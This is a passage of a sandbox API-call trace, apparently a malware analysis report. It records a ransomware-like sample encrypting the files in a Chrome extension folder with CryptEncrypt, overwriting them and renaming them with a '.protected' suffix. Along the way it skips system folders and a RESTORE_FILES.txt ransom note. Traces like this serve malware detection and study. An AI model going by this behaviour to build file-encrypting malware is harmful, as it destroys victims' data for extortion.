nNumberOfBytesToWrite=0x1a1d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x1a1d, lpOverlapped=0x0) returned 1 [0083.163] 
SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.163] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.164] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.164] CloseHandle (hObject=0x164) returned 1 [0083.164] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.protected") returned 172 [0083.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.protected")) returned 1 [0083.165] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.165] lstrcmpiW (lpString1="cast_app.js", lpString2="Windows") returned -1 [0083.165] lstrcmpiW 
(lpString1="cast_app.js", lpString2="Program Files") returned -1 [0083.165] lstrcmpiW (lpString1="cast_app.js", lpString2="Program Files (x86)") returned -1 [0083.165] lstrcmpiW (lpString1="cast_app.js", lpString2="$Recycle.bin") returned 1 [0083.165] lstrcmpiW (lpString1="cast_app.js", lpString2="System Volume Information") returned -1 [0083.165] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js") returned 161 [0083.165] StrStrIW (lpFirst="cast_app.js", lpSrch=".protected") returned 0x0 [0083.165] lstrcmpW (lpString1="cast_app.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.165] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.165] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.166] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js") returned 161 [0083.166] StrStrW (lpFirst="cast_app.js", lpSrch=".txt") returned 0x0 [0083.166] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js") returned 161 [0083.166] StrStrW (lpFirst="cast_app.js", lpSrch=".rar") returned 0x0 [0083.166] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js") returned 161 [0083.166] StrStrW (lpFirst="cast_app.js", lpSrch=".zip") returned 0x0 [0083.166] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0083.168] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.168] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0083.168] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.168] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.170] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.170] CloseHandle (hObject=0x164) returned 1 [0083.170] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.protected") returned 171 [0083.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.protected")) returned 1 [0083.171] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="Windows") returned -1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="Program Files") returned -1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="Program Files (x86)") returned -1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="$Recycle.bin") returned 1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="System Volume Information") returned -1 [0083.171] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js") returned 170 [0083.171] StrStrIW (lpFirst="cast_app_redirect.js", lpSrch=".protected") returned 0x0 [0083.171] lstrcmpW 
(lpString1="cast_app_redirect.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.171] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.171] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js") returned 170 [0083.173] StrStrW (lpFirst="cast_app_redirect.js", lpSrch=".txt") returned 0x0 [0083.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js") returned 170 [0083.173] StrStrW (lpFirst="cast_app_redirect.js", lpSrch=".rar") returned 0x0 [0083.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js") returned 170 [0083.173] StrStrW (lpFirst="cast_app_redirect.js", lpSrch=".zip") returned 0x0 [0083.173] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xf2, lpOverlapped=0x0) returned 1 [0083.174] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.174] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xf2, lpOverlapped=0x0) returned 1 [0083.174] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.174] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.174] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.174] CloseHandle (hObject=0x164) returned 1 [0083.174] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.protected") returned 180 [0083.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.protected")) returned 1 [0083.175] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="Windows") returned -1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="Program Files") returned -1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="Program Files (x86)") returned -1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="$Recycle.bin") returned 1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="System Volume Information") returned -1 [0083.175] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png") returned 174 [0083.175] StrStrIW (lpFirst="chromecast_logo_grey.png", lpSrch=".protected") returned 0x0 [0083.175] lstrcmpW (lpString1="chromecast_logo_grey.png", lpString2="RESTORE_FILES.txt") returned -1 [0083.175] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.175] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png") returned 174 [0083.176] StrStrW (lpFirst="chromecast_logo_grey.png", lpSrch=".txt") returned 0x0 [0083.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png") returned 174 [0083.176] StrStrW (lpFirst="chromecast_logo_grey.png", lpSrch=".rar") returned 0x0 [0083.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png") returned 174 [0083.176] StrStrW (lpFirst="chromecast_logo_grey.png", lpSrch=".zip") returned 0x0 [0083.176] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x1bef, lpOverlapped=0x0) returned 1 [0083.181] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffe411, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.182] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x1bef, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: 
lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x1bef, lpOverlapped=0x0) returned 1 [0083.182] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.182] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.182] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.182] CloseHandle (hObject=0x164) returned 1 [0083.182] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.protected") returned 184 [0083.182] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.protected")) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x47bbd0, 
lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="Windows") returned -1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="Program Files") returned -1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="Program Files (x86)") returned -1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="$Recycle.bin") returned 1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="System Volume Information") returned -1 [0083.183] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html") returned 162 [0083.183] StrStrIW (lpFirst="devices.html", lpSrch=".protected") returned 0x0 [0083.183] lstrcmpW (lpString1="devices.html", lpString2="RESTORE_FILES.txt") returned -1 [0083.183] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.183] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html") returned 162 [0083.184] StrStrW (lpFirst="devices.html", lpSrch=".txt") returned 0x0 [0083.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html") returned 162 [0083.184] StrStrW (lpFirst="devices.html", lpSrch=".rar") returned 0x0 [0083.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html") returned 162 [0083.184] StrStrW (lpFirst="devices.html", lpSrch=".zip") returned 0x0 [0083.184] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.185] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.185] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.185] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.185] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.186] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, 
lpOverlapped=0x0) returned 1 [0083.186] CloseHandle (hObject=0x164) returned 1 [0083.186] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.protected") returned 172 [0083.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.protected")) returned 1 [0083.187] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="Windows") returned -1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="Program Files") returned -1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="Program Files (x86)") returned -1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="$Recycle.bin") returned 1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="System Volume Information") returned -1 [0083.187] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
